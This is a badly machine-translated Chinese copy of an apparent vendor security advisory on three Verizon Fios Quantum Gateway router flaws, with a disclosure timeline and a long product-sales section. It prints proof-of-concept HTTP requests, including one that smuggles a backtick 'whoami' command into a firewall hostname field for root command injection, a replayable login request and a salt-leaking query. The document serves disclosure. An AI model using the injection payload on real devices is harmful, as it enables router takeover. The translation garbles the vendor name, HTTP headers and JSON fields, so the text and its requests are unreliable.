脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

Verizon Fios量子网关多个漏洞

剧情简介

站得住脚的发现了多个漏洞Verizon Fios量子网关。

cve - 2019 - 3914:验证命令注入

一个命令注入漏洞被发现在API的后端。这个漏洞可以利用远程实现使用root特权命令执行。攻击者必须经过身份验证的设备的管理web应用程序以执行命令注入。

这个问题存在由于防火墙访问控制规则的方式处理。具体来说,漏洞可以通过添加一个访问控制规则触发网络对象的主机名。

例如,如果一个网络对象添加主机名的“whoami”(注意引号),和这个对象用于防火墙的访问控制规则,‘whoami命令将被执行。

下面是日志条目/ chroot / mnt /日志/用户。注意,“whoami”纳入iptables命令。

用户。犯错< 11 > bhr4:防火墙。AccessControlRulesLog:未能删除规则:iptables - AC_B_1_NWOBJ_1 - s - j AC_B_1_SERVICES whoami

下面是一个概念证明的HTTP请求。请注意,该命令的结果将不退还。请注意,有可能获得一个root shell。

POST / api /防火墙/ accesscontrol HTTP / 1.1主持人:192.168.1.1连接:维生接受编码:gzip、缩小接受:* / * - agent: python-requests / 2.11.1 X-XSRF-TOKEN: 1 eaa16ee9264d388574253cfd0a2357e8c47718f9b4b8ac43b93c1571e0cdcda8ad3ad368389254bf4851ed68b3cc264a03003b477f59f33dc35c725fd0f6c89饼干:会话= 944817705;XSRF-TOKEN内容长度= 1 eaa16ee9264d388574253cfd0a2357e8c47718f9b4b8ac43b93c1571e0cdcda8ad3ad368389254bf4851ed68b3cc264a03003b477f59f33dc35c725fd0f6c89: 373 - type: application / json {“blockRule”:真的,“安排”:“”,“networkObjects”:[{“规则”:[{“主机名”:“whoami”,“networkObjType”: 4}],“类型”:3,“名字”:“史”}],“启用”:真的,“主机”:[],“哪些行程”:{},“服务”:[]}

cve - 2019 - 3915:登录重播

登录过程容易重播。鉴于HTTP不是执行,攻击者可以拦截一个登录请求,随后回放它进入路由器的管理web界面。

当一个用户试图登录,咸sha - 512密码散列发布。这都是攻击者需要登录。例如,登录请求看起来像这样:

POST / api /登录HTTP / 1.1主持人:192.168.1.1 user - agent: Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.13;房车:Firefox 63.0)壁虎/ 20100101 / 63.0接受:application / json文本/平原,* / *接收语言:en - us, en; q = 0.5接受编码:gzip、缩小推荐人:http://192.168.1.1/ - type: application / json; charset = utf - 8内容长度:143连接:紧密饼干:测试{“密码”:“5 e619e19824b1072f89ff309e3896b1b6dd31aebfab1698b2662d97352d9da9fbdbf7c165239a2214bdf9ae512821e78875a1b515bd4140ec919dda201f1001e”}

cve - 2019 - 3916:密码盐信息披露

未经过身份验证的攻击者能够检索密码盐的值,只需在web浏览器中访问URL。鉴于固件并不强制使用HTTPS,对攻击者来说是可行的捕获(嗅)登录请求。登录请求包含一个咸密码散列(sha - 512),那么攻击者就可以执行离线字典攻击恢复原来的密码。

概念验证下面显示一个HTTP请求/响应对。注意,返回“passwordSalt”。

GET / api HTTP / 1.1主持人:192.168.1.1连接:维生cache - control:信息= 0 Upgrade-Insecure-Requests: 1用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10 _13_6) AppleWebKit / 537.36 (KHTML,像壁虎)Chrome / 70.0.3538.110 Safari 537.36接受:text / html, application / xhtml + xml应用程序/ xml; q = 0.9,图像/ webp图像/ apng * / *; q = 0.8接受编码:gzip、缩小接收语言:en - us, en; q = 0.9饼干:测试;bhr4UI2HasToRefresh = false;bhr4HasEnteredAdvanced = true;会话=;XSRF-TOKEN =

HTTP / 1.1 401年未经授权的cache - control: no - cache - type: application / json;utf - 8字符集=内容长度:173日期:星期四,2018年12月06 13:00:40格林尼治时间服务器:lighttpd / 1.4.38 {“doSetupWizard”:假的,“requirePassword”:真的,“passwordSalt”:“6299 bfce - 1 - d56 - 4 - a6c 9 - bd8 - 352 dc9ce865c”、“isWireless”:假的,“错误”:1、“maxUsers”: 10“denyState”: 0,“denyTimeout”: 0}

解决方案

02.02.00.13升级固件版本。

披露时间表

12/11/2018——向供应商披露。90天的日期是03/12/2019。
12/12/2018——Verizon事件反应小组回答说Python附件是被屏蔽的。站得住脚的要求与我们的接触点跟进。
12/12/2018站得住脚的回复,说我们没有联系。我们要求我们的消息路由到适当的人。
从Verizon 12/14/2018——还没有收到任何回复。成立之前,确定适当的沟通方式。
12/14/2018——站得住脚的收到一个自动回复,分配一个参考号码的2018121418229。
12/14/2018——站得住脚的接收人响应,表明我们可以发送我们的信息披露和PoC。90天的日期搬到3/14/2019作为专业礼貌。
12/14/2018——站得住脚的机会重新发送该信息披露和PoC。
12/14/2018——站得住脚的收到一个自动回复,分配一个参考号码的2018121418773。
12/14/2018——Verizon联系人PoC站得住脚的要求。
12/14/2018——站得住脚的PoC的重新发送一次。
PoC 12/14/2018——Verizon承认他们已经收到。
12/14/2018——Verizon表示命令注入进行验证。他们开了一张票供应商来解决这个问题,他们会发送后续电子邮件一旦修复确认。
12/17/2018——站得住脚的问另外两个bug已经验证。
12/19/2018——Verizon回应道,其他两个bug将“正式”由另一组处理。以非官方的身份,这些虫子以前识别和矫正的路线图。然而,远端控制设备是新的。
又12/19/2018——Verizon回应:“Verizon检查提供的数据,我们正在积极与工程团队和供应商评估,适当、及时解决漏洞报告。”
12/19/2018——站得住脚的要求Verizon让我们与任何更新循环。
01/04/2019——站得住脚的要求更新。
01/04/2019——Vecirt说他们仍然测试和验证报告。他们将“采取适当的行动,包括使需要及时更新,如果需要的话。”
01/04/2019——站得住脚的伸出到另一个接触,希望获得更多的信息。
01/22/2019——站得住脚的遵循:提醒Verizon 90日期,要求更新,要求首选直接接触。
01/23/2019——站得住脚的告知Verizon,通过cve cve - 2019 - 3914 - 2019 - 3916将被指派为发现的漏洞。
01/23/2019——Verizon响应。他们是“仍然测试和将采取适当的行动,包括使需要及时更新,如果需要的话。”They will "have a response for the public report before the March 14, 2019 date."
01/24/2019——站得住脚的问Verizon正在考虑一个特定的日期。
01/29/2019——Verizon”没有一个特定的预期完成日期”。Nevertheless, they "certainly plan to continue providing updates to you as our validation and testing efforts progress, and are completed."
02/13/2019——站得住脚的Verizon要求更新。
02/19/2019——Verizon表示,错误将被固定在固件版本2.2中,在不久的将来,它将被部署。
02/19/2019——站得住脚的2.2版将部署时问。
02.02.00.13 03/01/2019——Verizon将固件版本。
03/01/2019——站得住脚的研究咨询的意向通知Verizon发布前3/14。问Verizon计划发行一个顾问。
03/01/2019——Verizon通知站得住脚的,固件更新推小批量生产,这个过程不会直到3月13日完成。站得住脚的要求推迟一个顾问,直到3月14日。
03/01/2019——站得住脚的承认请求和问如果Verizon计划发行一个安全咨询。
03/04/2019——站得住脚的同意等到14。再问是否Verizon将发布一个安全咨询。
03/05/2019——Verizon说他们不会问题咨询。他们将固件更新时通知站得住脚的全面部署。
03/13/2019——Verizon通知站得住脚的固件更新已经完全部署。
04/05/2019——Verizon告知站得住脚的,一小部分客户仍需修补这些漏洞。
04/09/2019——站得住脚的释放研究咨询。

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
- 2019 - 17
信贷

克里斯•莱恩

CVSSv2基地/时间的分数
8.5/6.8
CVSSv2向量
AV: N /交流:M /非盟:S / C: C / I: C / A: C
受影响的产品
FiOS-G1100(固件版本:02.01.00.05)
风险因素

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map